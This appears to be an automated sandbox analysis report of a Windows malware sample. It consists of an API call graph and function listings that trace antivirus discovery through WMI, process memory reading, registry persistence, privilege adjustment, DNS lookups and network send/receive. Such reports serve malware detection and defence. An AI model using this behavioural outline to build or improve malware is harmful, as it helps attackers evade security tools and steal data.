API calls 6132->6133 6134 40a034 6133->6134 6134->6131 6135 404c49 2 API calls 6134->6135 6136 40a058 6135->6136 6137 40a07b 6136->6137 6138 40a08c 6136->6138 6139 407388 12 API calls 6137->6139 6140 403ad5 24 API calls 6138->6140 6139->6131 6140->6131 6141 405471 _endthreadex 6247 404533 6248 404b40 VirtualAlloc 6247->6248 6249 40454f 6248->6249 6267 4084ee 6249->6267 6251 404562 6252 40456c 6251->6252 6254 404c49 2 API calls 6251->6254 6266 404672 6251->6266 6253 408649 43 API calls 6255 404680 6253->6255 6256 40459e sscanf 6254->6256 6259 404687 _endthreadex 6255->6259 6257 4045c6 memset 6256->6257 6256->6266 6258 4045fc 6257->6258 6260 40460b _beginthreadex 6258->6260 6259->6252 6261 406efb LoadLibraryW 6260->6261 6262 404631 6261->6262 6263 40464f 6262->6263 6264 406efb LoadLibraryW 6262->6264 6265 401038 2 API calls 6263->6265 6264->6263 6265->6266 6266->6253 6268 406efb LoadLibraryW 6267->6268 6270 4084ff 6268->6270 6269 40851b 6269->6251 6270->6269 6271 406efb LoadLibraryW 6270->6271 6272 408530 6271->6272 6273 401050 2 API calls 6272->6273 6274 40853f 6273->6274 6274->6251 6940 4059b3 6941 404c49 2 API calls 6940->6941 6942 4059c6 6941->6942 6943 405a36 6942->6943 6944 405a19 6942->6944 6948 405a26 6942->6948 6951 40745b 6943->6951 6947 406efb LoadLibraryW 6944->6947 6946 408649 43 API calls 6949 405a50 6946->6949 6947->6948 6948->6946 6950 405a57 _endthreadex 6949->6950 6952 4010a2 2 API calls 6951->6952 6953 407471 6952->6953 6954 4074ba 6953->6954 6955 406efb LoadLibraryW 6953->6955 6954->6948 6956 407484 6955->6956 6957 406efb LoadLibraryW 6956->6957 6958 4074a3 6957->6958 6959 401050 2 API calls 6958->6959 6959->6954 5089 402174 5090 4021a7 __p__commode 5089->5090 5092 4021e3 5090->5092 5093 4021f7 5092->5093 5094 4021eb __setusermatherr 5092->5094 5103 4022de _controlfp 5093->5103 5094->5093 5096 4021fc _initterm __getmainargs _initterm 5097 402250 GetStartupInfoA 5096->5097 5099 402284 GetModuleHandleA 5097->5099 5104 40557e 5099->5104 5103->5096 5105 406efb LoadLibraryW 5104->5105 5106 40559a 5105->5106 5107 406efb LoadLibraryW 5106->5107 5108 4055b0 SetErrorMode 5107->5108 5119 4074bf 5108->5119 5111 406efb LoadLibraryW 5112 4055e6 5111->5112 5114 406efb LoadLibraryW 5112->5114 5116 405600 5112->5116 5113 40561f _beginthreadex 5113->5116 5114->5116 5115 406efb LoadLibraryW 5115->5116 5116->5113 5116->5115 5117 4022a8 exit _XcptFilter 5116->5117 5118 401038 2 API calls 5116->5118 5118->5116 5120 406efb LoadLibraryW 5119->5120 5121 4074d6 5120->5121 5122 406efb LoadLibraryW 5121->5122 5123 4074e8 5122->5123 5124 4055be 5123->5124 5125 406efb LoadLibraryW 5123->5125 5124->5111 5126 407503 LookupPrivilegeValueW 5125->5126 5127 406efb LoadLibraryW 5126->5127 5128 407538 AdjustTokenPrivileges 5127->5128 5129 401038 2 API calls 5128->5129 5129->5124 6275 405834 6278 4056fa 6275->6278 6277 405848 6285 404bcf 6278->6285 6280 405707 6284 40572c 6280->6284 6288 407552 6280->6288 6282 405720 6283 404bcf LoadLibraryW 6282->6283 6283->6284 6284->6277 6286 406efb LoadLibraryW 6285->6286 6287 404be2 6286->6287 6287->6280 6289 404c49 2 API calls 6288->6289 6290 40756e 6289->6290 6291 406efb LoadLibraryW 6290->6291 6292 40757d 6291->6292 6293 406efb LoadLibraryW 6292->6293 6295 4075c4 6292->6295 6294 4075a6 6293->6294 6294->6295 6296 401050 2 API calls 6294->6296 6295->6282 6296->6295 6972 4095b7 6973 404b40 VirtualAlloc 6972->6973 6974 4095d2 6973->6974 6975 40a1d2 39 API calls 6974->6975 6976 4095e8 6975->6976 6978 404c17 2 API calls 6976->6978 6995 4096d1 6976->6995 6977 408649 43 API calls 6981 4096f5 6977->6981 6979 4095ff 6978->6979 6980 404c49 2 API calls 6979->6980 6983 40960b 6980->6983 6982 409705 _endthreadex 6981->6982 6984 4046f2 3 API calls 6983->6984 6985 40962c 6984->6985 6999 406df0 6985->6999 6987 409640 6988 406df0 8 API calls 6987->6988 6989 409657 6988->6989 6990 404b40 VirtualAlloc 6989->6990 6991 409675 _beginthreadex 6990->6991 6992 409692 6991->6992 6991->6995 6993 406efb LoadLibraryW 6992->6993 6994 40969f 6993->6994 6996 406efb LoadLibraryW 6994->6996 6995->6977 6997 4096b6 6996->6997 6998 401038 2 API calls 6997->6998 6998->6995 7000 402e20 7 API calls 6999->7000 7001 406e07 7000->7001 7002 402e20 7 API calls 7001->7002 7003 406e16 7002->7003 7004 4053cb 2 API calls 7003->7004 7005 406e24 7004->7005 7006 4053cb 2 API calls 7005->7006 7007 406e30 7006->7007 7007->6987 6297 407138 6310 407038 GetModuleHandleA 6297->6310 6299 40713f 6300 401687 5 API calls 6299->6300 6301 407176 6300->6301 6302 4071b3 ExitThread 6301->6302 6303 406efb LoadLibraryW 6301->6303 6304 407188 6303->6304 6305 406efb LoadLibraryW 6304->6305 6306 407193 6305->6306 6307 4071ae 6306->6307 6308 409717 31 API calls 6306->6308 6309 4058f2 36 API calls 6307->6309 6308->6307 6309->6302 6311 40704c 6310->6311 6311->6299 7008 40a8b8 7009 404b40 VirtualAlloc 7008->7009 7010 40a8cd 7009->7010 7011 404c49 2 API calls 7010->7011 7012 40a8db 7011->7012 7013 40a93a 7012->7013 7015 40a901 sprintf 7012->7015 7016 40a916 sprintf 7012->7016 7014 4089a3 3 API calls 7013->7014 7017 40a946 7014->7017 7015->7012 7016->7012 7018 40a5f5 69 API calls 7017->7018 7020 40a959 7017->7020 7018->7020 7019 408649 43 API calls 7021 40a96d 7019->7021 7020->7019 7022 40a97d _endthreadex 7021->7022 5130 4097b9 5131 404c49 2 API calls 5130->5131 5132 4098a9 wsprintfW 5131->5132 5146 408d7e GetModuleHandleW 5132->5146 5134 4098fa 5135 409906 memset memset 5134->5135 5136 404c49 2 API calls 5135->5136 5137 409947 5136->5137 5164 40974a 5137->5164 5139 409b8a 5140 409b92 _endthreadex 5139->5140 5143 409989 5143->5139 5145 409b14 _beginthreadex 5143->5145 5169 4085b3 memset 5143->5169 5178 408545 5143->5178 5189 408482 5143->5189 5145->5143 5147 408da8 GetProcAddress 5146->5147 5149 408da1 5146->5149 5148 408dba 5147->5148 5147->5149 5199 4064d0 WideCharToMultiByte 5148->5199 5149->5134 5153 408de5 5153->5149 5154 404c49 2 API calls 5153->5154 5155 408e0e wcslen 5154->5155 5156 404c49 2 API calls 5155->5156 5157 408e26 wcslen 5156->5157 5219 40655c 5157->5219 5159 408e39 5159->5149 5160 408e80 5159->5160 5161 408e6e 5159->5161 5242 403ad5 5160->5242 5229 407388 5161->5229 5392 403012 5164->5392 5166 409755 5168 409777 5166->5168 5398 4063b6 5166->5398 5168->5143 5170 406efb LoadLibraryW 5169->5170 5171 4085f1 RegOpenKeyExA 5170->5171 5172 40860b 5171->5172 5177 40863f 5171->5177 5173 406efb LoadLibraryW 5172->5173 5174 40861b RegQueryValueExA 5173->5174 5175 408637 5174->5175 5174->5177 5413 401050 5175->5413 5177->5143 5416 4010a2 5178->5416 5180 40855b 5181 4085af 5180->5181 5182 406efb LoadLibraryW 5180->5182 5181->5143 5183 40856f Sleep 5182->5183 5184 408580 5183->5184 5185 406efb LoadLibraryW 5184->5185 5186 408592 RegSetValueExA 5185->5186 5187 401050 2 API calls 5186->5187 5188 4085a7 5187->5188 5188->5143 5190 4010a2 2 API calls 5189->5190 5191 408498 5190->5191 5192 4084ea 5191->5192 5193 406efb LoadLibraryW 5191->5193 5192->5143 5194 4084ab 5193->5194 5195 406efb LoadLibraryW 5194->5195 5196 4084ca RegSetValueExA 5195->5196 5197 401050 2 API calls 5196->5197 5198 4084e3 5197->5198 5198->5143 5200 4064f5 5199->5200 5204 40650e 5199->5204 5201 404c49 2 API calls 5200->5201 5202 4064fe 5201->5202 5203 406efb LoadLibraryW 5202->5203 5203->5204 5205 40887b 5204->5205 5206 40888e 5205->5206 5207 404c49 2 API calls 5206->5207 5208 408894 5207->5208 5209 404c49 2 API calls 5208->5209 5210 4088a5 5209->5210 5211 4088b4 strstr 5210->5211 5217 40890d 5210->5217 5212 4088c8 5211->5212 5213 4088ce strstr 5211->5213 5212->5213 5214 4088de strstr strstr strstr 5213->5214 5216 40893d 5214->5216 5214->5217 5216->5217 5218 408960 atoi 5216->5218 5217->5153 5218->5217 5220 40656b 5219->5220 5225 406567 5219->5225 5221 4064d0 3 API calls 5220->5221 5222 406574 5221->5222 5223 40657f CryptBinaryToStringW 5222->5223 5222->5225 5224 40659c 5223->5224 5223->5225 5226 404c49 2 API calls 5224->5226 5225->5159 5227 4065a9 5226->5227 5227->5225 5228 406efb LoadLibraryW 5227->5228 5228->5225 5253 4071e2 5229->5253 5231 407398 5240 4073a1 5231->5240 5267 4071bc 5231->5267 5233 4073c2 5234 4073c9 5233->5234 5235 4073dc 5233->5235 5237 406efb LoadLibraryW 5234->5237 5270 407286 5235->5270 5237->5240 5238 4073e7 5239 406efb LoadLibraryW 5238->5239 5241 4073f6 closesocket 5239->5241 5240->5149 5241->5240 5309 40315a 5242->5309 5244 403ae1 5245 404c49 2 API calls 5244->5245 5252 403b1d 5244->5252 5246 403aec 5245->5246 5316 4033a4 5246->5316 5248 403af9 5320 4039bd 5248->5320 5250 403b15 5335 403097 5250->5335 5252->5149 5281 4010ce 5253->5281 5255 4071ee 5256 406efb LoadLibraryW 5255->5256 5266 4071f5 5255->5266 5257 407211 setsockopt 5256->5257 5284 4082b1 5257->5284 5260 406efb LoadLibraryW 5261 407244 5260->5261 5262 406efb LoadLibraryW 5261->5262 5263 40725c connect 5262->5263 5264 40726b 5263->5264 5263->5266 5265 406efb LoadLibraryW 5264->5265 5265->5266 5266->5231 5268 406efb LoadLibraryW 5267->5268 5269 4071cc send 5268->5269 5269->5233 5271 404c49 2 API calls 5270->5271 5272 4072a1 5271->5272 5273 406efb LoadLibraryW 5272->5273 5277 407337 5272->5277 5274 4072ba recv 5273->5274 5274->5277 5278 4072cc 5274->5278 5275 404c49 2 API calls 5275->5278 5277->5238 5278->5275 5278->5277 5279 406efb LoadLibraryW 5278->5279 5299 404c6a 5278->5299 5280 407322 recv 5279->5280 5280->5277 5280->5278 5282 406efb LoadLibraryW 5281->5282 5283 4010db socket 5282->5283 5283->5255 5290 408324 5284->5290 5286 404c17 VirtualAlloc LoadLibraryW 5286->5290 5287 407234 5287->5260 5288 406efb LoadLibraryW 5289 408374 DnsQuery_A 5288->5289 5289->5290 5290->5286 5290->5287 5290->5288 5291 406efb LoadLibraryW 5290->5291 5292 408248 5290->5292 5291->5290 5293 406efb LoadLibraryW 5292->5293 5294 408259 DnsQuery_A 5293->5294 5295 408272 5294->5295 5296 408276 5294->5296 5295->5290 5297 406efb LoadLibraryW 5296->5297 5298 4082a5 5297->5298 5298->5290 5300 404c75 5299->5300 5303 404c7b 5299->5303 5305 404ba6 5300->5305 5302 404c49 2 API calls 5304 404c8c 5302->5304 5303->5302 5303->5304 5304->5278 5306 404bb3 5305->5306 5307 404bbe 5305->5307 5308 406efb LoadLibraryW 5306->5308 5307->5303 5308->5307 5310 403163 LoadLibraryW 5309->5310 5311 4031af 5309->5311 5312 403177 5310->5312 5313 40317a GetProcAddress 5310->5313 5311->5244 5312->5244 5314 40318a 5313->5314 5314->5311 5315 40319a FreeLibrary 5314->5315 5315->5312 5317 404c49 2 API calls 5316->5317 5318 4033b3 memset 5317->5318 5319 4033dd 5318->5319 5319->5248 5339 403958 5320->5339 5324 4039e5 5325 404c49 2 API calls 5324->5325 5326 4039f6 5325->5326 5331 403a87 5326->5331 5355 40365d 5326->5355 5328 403a70 5329 406efb LoadLibraryW 5328->5329 5329->5331 5330 404c49 2 API calls 5333 403a0b 5330->5333 5331->5250 5332 404c6a 2 API calls 5332->5333 5333->5328 5333->5330 5333->5331 5333->5332 5334 40365d 12 API calls 5333->5334 5334->5333 5336 4030d7 5335->5336 5337 403144 5336->5337 5338 40312a send 5336->5338 5337->5252 5338->5337 5340 406efb LoadLibraryW 5339->5340 5341 40396e 5340->5341 5342 406efb LoadLibraryW 5341->5342 5343 40398d 5342->5343 5368 4031b3 5343->5368 5345 4039ad 5377 403882 getpeername inet_ntoa 5345->5377 5348 403209 memset 5349 40323f 5348->5349 5350 404c49 2 API calls 5349->5350 5354 403341 5349->5354 5353 40325a 5350->5353 5351 40327d memcpy 5351->5353 5352 406efb LoadLibraryW 5352->5353 5353->5351 5353->5352 5353->5354 5354->5324 5356 403671 memcpy memmove 5355->5356 5362 4036ad 5355->5362 5358 403861 5356->5358 5358->5333 5359 4036dd recv 5359->5358 5359->5362 5360 403872 5361 403097 send 5360->5361 5361->5358 5362->5358 5362->5359 5362->5360 5363 4037c8 memcpy 5362->5363 5364 403817 memmove 5362->5364 5365 4037f7 memcpy 5362->5365 5366 404c6a VirtualAlloc LoadLibraryW 5362->5366 5367 40342e 5 API calls 5362->5367 5363->5362 5364->5362 5365->5362 5366->5362 5367->5362 5369 4031c4 5368->5369 5370 4031bf 5368->5370 5371 406efb LoadLibraryW 5369->5371 5370->5345 5372 4031d8 5371->5372 5373 4082b1 4 API calls 5372->5373 5374 4031ea 5373->5374 5375 406efb LoadLibraryW 5374->5375 5376 4031fa 5375->5376 5376->5345 5378 4038f3 5377->5378 5380 403908 send 5378->5380 5381 4038fa 5378->5381 5382 40391c 5378->5382 5380->5381 5380->5382 5381->5348 5382->5381 5383 40342e 5382->5383 5389 403441 5383->5389 5384 404c6a 2 API calls 5384->5389 5385 406efb LoadLibraryW 5385->5389 5386 403569 send 5387 4035e7 5386->5387 5386->5389 5387->5381 5388 40360e 5388->5387 5390 403614 memmove 5388->5390 5389->5384 5389->5385 5389->5386 5389->5387 5389->5388 5391 4035bb memmove 5389->5391 5390->5387 5391->5389 5394 403028 5392->5394 5393 403078 5393->5166 5394->5393 5406 402ef0 5394->5406 5396 40305b 5396->5393 5397 402ef0 2 API calls 5396->5397 5397->5393 5399 4063d2 5398->5399 5400 406efb LoadLibraryW 5399->5400 5402 4063d9 5399->5402 5401 4063ec 5400->5401 5401->5402 5403 404c49 2 API calls 5401->5403 5402->5168 5404 406412 5403->5404 5404->5402 5405 406efb LoadLibraryW 5404->5405 5405->5402 5407 402f06 5406->5407 5409 402f5a 5406->5409 5407->5409 5410 401068 5407->5410 5409->5396 5411 406efb LoadLibraryW 5410->5411 5412 401078 VirtualFree 5411->5412 5412->5409 5414 406efb LoadLibraryW 5413->5414 5415 401060 RegCloseKey 5414->5415 5415->5177 5417 406efb LoadLibraryW 5416->5417 5418 4010b2 RegCreateKeyExA 5417->5418 5418->5180 6830 40acfd 6831 40ad0c InternetQueryOptionA 6830->6831 6833 40ad93 6830->6833 6832 404c49 2 API calls 6831->6832 6834 40ad2a InternetQueryOptionA 6832->6834 6834->6833 6835 40ad3e 6834->6835 6836 404c17 2 API calls 6835->6836 6837 40ad46 6836->6837 6838 404b40 VirtualAlloc 6837->6838 6839 40ad5a 6838->6839 6840 404b40 VirtualAlloc 6839->6840 6841 40ad67 CreateThread WaitForSingleObject 6840->6841 6841->6833 5452 40547f 5467 40b030 5452->5467 5457 4054f8 clock 5484 4083d7 memset 5457->5484 5461 406efb LoadLibraryW 5462 405548 5461->5462 5463 401038 2 API calls 5462->5463 5464 40555b clock 5463->5464 5464->5457 5465 405566 5464->5465 5465->5457 5494 401020 5465->5494 5468 40548f memset memset 5467->5468 5469 407ffb 5468->5469 5497 4079b2 5469->5497 5471 40800a 5512 407d09 memset memset 5471->5512 5473 408017 5528 407795 5473->5528 5479 408032 5574 407e8f 5479->5574 5483 4054cd _beginthreadex _beginthreadex 5483->5457 5485 406efb LoadLibraryW 5484->5485 5486 408416 RegOpenKeyExW 5485->5486 5487 408433 5486->5487 5488 408444 5486->5488 5490 401050 2 API calls 5487->5490 5489 406efb LoadLibraryW 5488->5489 5492 408455 RegQueryValueExW 5489->5492 5491 405503 _beginthreadex 5490->5491 5491->5461 5492->5487 5493 408470 _wtoi 5492->5493 5493->5487 5495 406efb LoadLibraryW 5494->5495 5496 401030 5495->5496 5496->5465 5498 406efb LoadLibraryW 5497->5498 5499 4079c7 5498->5499 5594 404c17 5499->5594 5501 4079da 5597 40740f GetModuleHandleW GetProcAddress 5501->5597 5504 406efb LoadLibraryW 5505 407a01 RegOpenKeyExW 5504->5505 5506 407a1a 5505->5506 5510 407a65 5505->5510 5507 406efb LoadLibraryW 5506->5507 5508 407a31 RegQueryValueExW 5507->5508 5509 407a47 5508->5509 5511 401050 2 API calls 5509->5511 5510->5471 5511->5510 5603 4078d2 GetCurrentThread OpenThreadToken 5512->5603 5514 407d70 memset 5515 406efb LoadLibraryW 5514->5515 5516 407d97 5515->5516 5517 407e70 5516->5517 5518 407daf memset wsprintfW 5516->5518 5632 40652e 5517->5632 5520 4064d0 3 API calls 5518->5520 5522 407dfb strlen 5520->5522 5521 407e75 wcscpy 5523 407e5b 5521->5523 5616 40632b 5522->5616 5523->5473 5529 406efb LoadLibraryW 5528->5529 5530 4077d2 5529->5530 5531 4077e4 5530->5531 5532 4078b7 wcscpy 5530->5532 5534 407890 5531->5534 5535 407870 wcscpy 5531->5535 5533 4078cb 5532->5533 5539 407b22 wcscpy CoInitializeEx 5533->5539 5536 40740f 4 API calls 5534->5536 5535->5534 5537 407898 wcscat 5536->5537 5537->5533 5540 407b50 CoInitializeSecurity 5539->5540 5541 407d04 5539->5541 5542 407b69 CoCreateInstance 5540->5542 5543 407cfe CoUninitialize 5540->5543 5560 407eb8 5541->5560 5542->5543 5544 407b8b 5542->5544 5543->5541 5545 406efb LoadLibraryW 5544->5545 5546 407ba5 SysAllocString 5545->5546 5548 407be2 SysFreeString 5546->5548 5549 407bf7 CoSetProxyBlanket 5548->5549 5559 407ce9 5548->5559 5550 407c12 SysAllocString SysAllocString 5549->5550 5549->5559 5551 407c3c SysFreeString SysFreeString 5550->5551 5552 407c50 5551->5552 5551->5559 5553 407ca9 5552->5553 5554 407c81 wcscpy VariantClear 5552->5554 5555 407cd2 5553->5555 5556 407cc2 wcscpy 5553->5556 5554->5552 5557 408a90 4 API calls 5555->5557 5556->5559 5558 407cd9 wcscpy 5557->5558 5558->5559 5559->5543 5561 407ed1 wcslen 5560->5561 5635 4065e5 5561->5635 5563 407eb8 50 API calls 5571 407ee8 5563->5571 5564 407f05 wcstok 5564->5571 5565 408d7e 43 API calls 5565->5571 5566 406efb LoadLibraryW 5566->5571 5567 407f90 wcstok 5567->5571 5568 403012 2 API calls 5568->5571 5569 4063b6 2 API calls 5569->5571 5571->5561 5571->5563 5571->5564 5571->5565 5571->5566 5571->5567 5571->5568 5571->5569 5572 407fc3 wcscpy 5571->5572 5645 402d51 5571->5645 5573 407fd8 5572->5573 5573->5479 5658 408b47 5574->5658 5576 407e96 5664 407734 5576->5664 5578 407e9b 5579 407a86 5578->5579 5689 40878c 5579->5689 5581 407b06 wcscpy 5584 407b1c 5581->5584 5582 407a8f 5582->5581 5583 404c49 2 API calls 5582->5583 5585 407aa2 5583->5585 5584->5483 5586 404c49 2 API calls 5585->5586 5587 407ab0 5586->5587 5588 406efb LoadLibraryW 5587->5588 5591 407ac1 5588->5591 5589 407af1 5590 408714 5 API calls 5589->5590 5592 407afc 5590->5592 5591->5589 5593 407adf wsprintfW 5591->5593 5592->5581 5593->5589 5595 406efb LoadLibraryW 5594->5595 5596 404c27 VirtualAlloc 5595->5596 5596->5501 5598 407452 5597->5598 5599 407437 5597->5599 5598->5504 5600 406efb LoadLibraryW 5599->5600 5601 407444 IsWow64Process 5600->5601 5601->5598 5604 407900 GetLastError 5603->5604 5605 407928 GetTokenInformation 5603->5605 5606 407911 GetCurrentProcess OpenProcessToken 5604->5606 5615 40798a 5604->5615 5607 407940 GetLastError 5605->5607 5605->5615 5606->5605 5606->5615 5609 40794b 5607->5609 5607->5615 5608 407997 CloseHandle 5611 4079a0 5608->5611 5610 404c49 2 API calls 5609->5610 5612 407953 5610->5612 5611->5514 5613 40795a GetTokenInformation 5612->5613 5612->5615 5614 40796d LookupAccountSidW 5613->5614 5613->5615 5614->5615 5615->5608 5615->5611 5617 40633c 5616->5617 5618 406343 memset wsprintfW 5617->5618 5619 406efb LoadLibraryW 5617->5619 5624 408a90 5618->5624 5620 406357 5619->5620 5620->5618 5621 404c49 2 API calls 5620->5621 5622 406379 5621->5622 5622->5618 5623 406efb LoadLibraryW 5622->5623 5623->5618 5625 408a9e 5624->5625 5626 407e49 wcscpy 5625->5626 5627 408aa9 wcslen 5625->5627 5626->5523 5627->5626 5628 408abf 5627->5628 5629 404c49 2 API calls 5628->5629 5630 408ac9 5629->5630 5630->5626 5631 408b14 wsprintfW 5630->5631 5631->5630 5633 404c49 2 API calls 5632->5633 5634 406539 5633->5634 5634->5521 5634->5634 5636 4065fe 5635->5636 5637 406efb LoadLibraryW 5636->5637 5643 406605 5636->5643 5638 40661b 5637->5638 5639 404c49 2 API calls 5638->5639 5638->5643 5640 406645 5639->5640 5641 406efb LoadLibraryW 5640->5641 5640->5643 5642 406655 5641->5642 5642->5643 5651 406457 5642->5651 5643->5571 5649 402d63 5645->5649 5646 402dea 5646->5571 5647 402d7c toupper toupper 5648 402d93 toupper toupper 5647->5648 5647->5649 5648->5649 5649->5646 5649->5647 5650 402dc7 toupper toupper 5649->5650 5650->5649 5652 406efb LoadLibraryW 5651->5652 5654 40646c 5652->5654 5653 4064a5 5653->5643 5654->5653 5655 404c49 2 API calls 5654->5655 5656 406499 5655->5656 5657 406efb LoadLibraryW 5656->5657 5657->5653 5659 408b4e 5658->5659 5660 40655c 4 API calls 5659->5660 5661 408b55 5660->5661 5672 408714 5661->5672 5663 408b62 5663->5576 5680 402e20 5664->5680 5666 40774a 5667 406efb LoadLibraryW 5666->5667 5668 407759 CreateFileW 5667->5668 5669 407776 5668->5669 5670 407789 5669->5670 5671 407780 CloseHandle 5669->5671 5670->5578 5671->5670 5673 406efb LoadLibraryW 5672->5673 5674 40872b RegCreateKeyExW 5673->5674 5675 408780 5674->5675 5676 40874a wcslen 5674->5676 5675->5663 5677 406efb LoadLibraryW 5676->5677 5678 408769 RegSetValueExW 5677->5678 5679 401050 2 API calls 5678->5679 5679->5675 5681 404c49 2 API calls 5680->5681 5682 402e2f SHGetFolderPathW 5681->5682 5683 402e45 5682->5683 5684 402e81 5682->5684 5685 402e78 PathAppendW 5683->5685 5686 402e58 PathAppendW 5683->5686 5684->5666 5685->5684 5686->5685 5687 402e63 CreateDirectoryW 5686->5687 5687->5685 5688 402e6f SetFileAttributesW 5687->5688 5688->5685 5690 406efb LoadLibraryW 5689->5690 5691 4087a8 RegOpenKeyExW 5690->5691 5692 4087c0 5691->5692 5693 4087d1 5691->5693 5695 401050 2 API calls 5692->5695 5694 404c49 2 API calls 5693->5694 5696 4087df 5694->5696 5697 4087ca 5695->5697 5698 406efb LoadLibraryW 5696->5698 5697->5582 5699 4087f3 RegQueryValueExW 5698->5699 5699->5692

                                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                                            Function 00407B22 Relevance: 40.4, APIs: 16, Strings: 7, Instructions: 188memorycomCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • wcscpy.MSVCRT ref: 00407B36
                                                                                                                                                                                                                                                                                            • CoInitializeEx.COMBASE(00000000,00000000), ref: 00407B42
                                                                                                                                                                                                                                                                                            • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00407B5B
                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(0040C35C,00000000,00000001,0040C28C,?), ref: 00407B7D
                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(ROOT\SecurityCenter), ref: 00407BCA
                                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00407BEC
                                                                                                                                                                                                                                                                                            • CoSetProxyBlanket.COMBASE(0040802B,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00407C04
                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(WQL), ref: 00407C1A
                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(SELECT * FROM AntiVirusProduct), ref: 00407C24
                                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00407C42
                                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00407C45
                                                                                                                                                                                                                                                                                            • wcscpy.MSVCRT ref: 00407C87
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00407C93
                                                                                                                                                                                                                                                                                            • wcscpy.MSVCRT ref: 00407CC8
                                                                                                                                                                                                                                                                                            • wcscpy.MSVCRT ref: 00407CDD
                                                                                                                                                                                                                                                                                            • CoUninitialize.COMBASE ref: 00407CFE
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: String$wcscpy$AllocFree$Initialize$BlanketClearCreateInstanceProxySecurityUninitializeVariant
                                                                                                                                                                                                                                                                                            • String ID: N/A$Not%20installed$ROOT\SecurityCenter$ROOT\SecurityCenter2$SELECT * FROM AntiVirusProduct$WQL$displayName
                                                                                                                                                                                                                                                                                            • API String ID: 2348074086-1641900438
                                                                                                                                                                                                                                                                                            • Opcode ID: eeaf18e7c5479f92f5b986c69bfef7b572b27737857ddda20f332f04ca5bdaac
                                                                                                                                                                                                                                                                                            • Instruction ID: 14b933085868c20b7664290315b8059269e27aae09e9c4c6532cf748e6fdc70d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eeaf18e7c5479f92f5b986c69bfef7b572b27737857ddda20f332f04ca5bdaac
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A751A171A04214FFDB109BA1DC88DEF7F78EF85750F10456AF505BA290C738A941CBA9
                                                                                                                                                                                                                                                                                            Function 004028ED Relevance: 10.7, APIs: 7, Instructions: 176sleepprocessCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040292B
                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040294E
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406EFB: LoadLibraryW.KERNELBASE(kernel32.dll,00000000,0ABF23CD,?,?,00000000), ref: 00406F81
                                                                                                                                                                                                                                                                                            • Process32FirstW.KERNEL32(?,0000022C), ref: 0040296A
                                                                                                                                                                                                                                                                                            • GetSystemInfo.KERNELBASE(00000000), ref: 004029D0
                                                                                                                                                                                                                                                                                            • ReadProcessMemory.KERNELBASE(00000000,?,?,?,00000000), ref: 00402A82
                                                                                                                                                                                                                                                                                              • Part of subcall function 00402500: memset.MSVCRT ref: 00402523
                                                                                                                                                                                                                                                                                              • Part of subcall function 00402500: memset.MSVCRT ref: 0040253B
                                                                                                                                                                                                                                                                                            • Process32NextW.KERNEL32(?,0000022C), ref: 00402ADC
                                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(?), ref: 00402B03
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: memset$Process32$AllocCreateFirstInfoLibraryLoadMemoryNextProcessReadSleepSnapshotSystemToolhelp32Virtual
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1240009946-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 31cfed496c4abfdc5d5b63704949701fa088fd0f3775925ce9e096dbb5085ccf
                                                                                                                                                                                                                                                                                            • Instruction ID: a09e17c9bf84d5d5d582aa3874472580bb7c6ac93d6df4c66b660d1a04c0cb9a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31cfed496c4abfdc5d5b63704949701fa088fd0f3775925ce9e096dbb5085ccf
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48519F71A00209ABDF11ABA9CD45BAE7BB4AF44704F10406AF005B62C1EF789A419B99
                                                                                                                                                                                                                                                                                            Function 004074BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406EFB: LoadLibraryW.KERNELBASE(kernel32.dll,00000000,0ABF23CD,?,?,00000000), ref: 00406F81
